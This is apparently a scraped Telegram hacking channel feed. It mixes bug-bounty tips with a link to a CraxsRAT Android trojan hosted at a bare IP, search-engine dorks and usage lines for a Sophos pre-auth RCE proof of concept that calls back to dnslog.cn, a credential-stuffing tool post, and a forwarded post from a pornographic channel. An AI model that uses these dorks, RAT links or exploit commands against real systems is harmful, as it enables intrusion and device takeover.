CrackCodes ๐Ÿ‡ฎ๐Ÿ‡ณ
15.9K subscribers
1.89K photos
387 videos
722 files
3.67K links
Official Websites: https://crackcodes.in |
For Bug Hunters: https://system32.ink

Admin: @MynK0x00
About Admin: prapattimynk.crackcodes.in


Be Secure~
เคœเคฏ เคถเฅเคฐเฅ€ เคฐเคพเคฎ
Download Telegram
Forwarded from Maal Gf Randi Bhabhi chudai Desi
#bugbountytips

โšก๏ธSpeed up your subdomain port scanning by querying A records from a list subdomains and removing duplicate IP addresses ๐Ÿƒโ€โ™€๏ธ๐Ÿ’จ

You can do this easily by chaining subfinder, dnsx, sort and naabu together:

subfinder -d domain.com -silent | dnxs -a -ro silent | sort -u | naabu -silent | tee ports.txt

โ›จ Follow : @HackingInsights
๐Ÿ‘2
httpXXX://147.182.180.78:8081/CraxsRat-Linuxndroid/

#CraxsRAT #CypherRAT
๐Ÿพ7
Forwarded from Vansh
https://secops.group/certifications/certified-cloud-security-practitioner-aws-ccsp-aws/

100% OFF Coupon : CCSP-AWS-VNM-100

Certified Cloud Security Practitionerโ€“AWS(CCSP-AWS) ยฃ100.00

AWS-CCSP 100% OFF Exam by The SecOps Group

๐Ÿ“ขWant a 100% discount code on our newly launched
Certified Cloud Security Practitioner - AWS (CCSP-AWS) exam?
๐Ÿ‘Œ1๐Ÿ†1
CVE-2023-27524: Apache Superset Auth Bypass


๐Ÿ’ฅ Script to check if an Apache Superset server is running with an insecure default configuration (CVE-2023-27524). The script checks if a Superset server's session cookies are signed with any well-known default Flask SECRET_KEYs.

The --validate flag can be used to validate exploitability by enumerating databases using the Superset API.

requirements:

flask-unsign==1.2.0
requests==2.26.0
Usage:

CVE-2023-27524.py [-h] --url URL [--id ID] [--validate] [--timeout TIMEOUT]

Download: https://system32.ink/news-feed/p/308/
CVE-2023-1671 | Pre-Auth RCE in Sophos Web Appliance


Dorkfofa

(title="Sophos Web Appliance" || app="Sophos-Web-Appliance") && title!="Sophos Web Appliance๏ผš้”™่ฏฏ่ฏทๆฑ‚"

ZoomEye

title:"Sophos Web Appliance"-title:"Sophos Web Appliance: Forbidden"-title:"Sophos Web Appliance: Bad Request"

Shodan

title:"Sophos Web Appliance"

Usage:

python CVE-2023-1671-POC.py -u http://www.example.com
python CVE-2023-1671-POC.py -u http://www.example.com -d xxxxxx.dnslog.cn
python CVE-2023-1671-POC.py -f urls.txt
python CVE-2023-1671-POC.py -f urls.txt -d xxxxxx.dnslog.cn

Download: https://system32.ink/news-feed/p/309/
Forwarded from Illucist
Recover Deleted Data Using PhotoRec Video

Watch: https://system32.ink/news-feed/p/311/
โคโ€๐Ÿ”ฅ3
๐ŸŽฏ How to Pass OSCP Exam ๐ŸŽฏ

If you are looking for a challenging and rewarding cybersecurity certification, look no further than the OSCP certification.

In this free blog post, we will provide working tips on how to pass the OSCP exam and become a Certified Cyber Security Professional!

โšก Link:
https://bit.ly/CrackOSCP

Learn ยฆ Share ยฆ Support
Forwarded from CYBER DEMONS (INDIA๐Ÿ‡ฎ๐Ÿ‡ณ) ๐Ÿค–CHANNEL๐Ÿค– (แดดแดฌแถœแดทแดธแดผแถœแดท)
๐Ÿ”ฅ OWASP TOP 10 ๐Ÿ”ฅ

SESSION AT SHARP 9 PM TODAY

BY JOB PROFESSIONALS

AT - @cyberdemonsindiaa

HOPE YOU'LL COME TO LEARN๐Ÿ˜Œ

#happyhacking
Media is too big
VIEW IN TELEGRAM
This movie will open the eyes of millions of Hindu girls.
#TheKeralaStory
โคโ€๐Ÿ”ฅ2
โšก3
๐Ÿ‘จ๐Ÿปโ€๐Ÿ’ปTop 10 Tools for Bug Bounty Hunters๐Ÿ‘จ๐Ÿปโ€๐Ÿ’ป

Bug bounty hunting is a career that is known for the heavy use of security tools.

These tools help the hunters find vulnerabilities in software, web applications and websites, and are an integral part of bounty hunting.

โšกLink :
bit.ly/BugBountyTools

Share :: Support :: Learn
A blog on mobile device security and mobile hacking

https://techofide.com/blogs/what-is-mobile-device-security-how-to-hack-a-phone-practical-demo/

Join our group for more such Cyber security content

t.me/ethicalhackingtechofide
Forwarded from LegionLeaker๐Ÿดโ€โ˜ ๏ธ
Media is too big
VIEW IN TELEGRAM
ComboList Wordpress Fucker(BETA Version) ๐Ÿ–•
Please open Telegram to view this post
VIEW IN TELEGRAM
๐˜ฝ๐™ช๐™œ ๐™๐™ฎ๐™ฅ๐™š: No Rate Limit

๐™‡๐™ž๐™ฃ๐™ : https://youtube.com/shorts/DKHYV6sjYXQ?feature=share

๐™‹๐™ก๐™š๐™–๐™จ๐™š ๐™จ๐™ช๐™—๐™จ๐™˜๐™ง๐™ž๐™—๐™š ๐™ฉ๐™ค ๐™ค๐™ช๐™ง ๐™”๐™ค๐™ช๐™๐™ช๐™—๐™š ๐™˜๐™๐™–๐™ฃ๐™ฃ๐™š๐™ก๐Ÿ™
CVE-2023-29007 | Git Arbitrary Configuration Injection

Download: https://system32.ink/news-feed/p/314/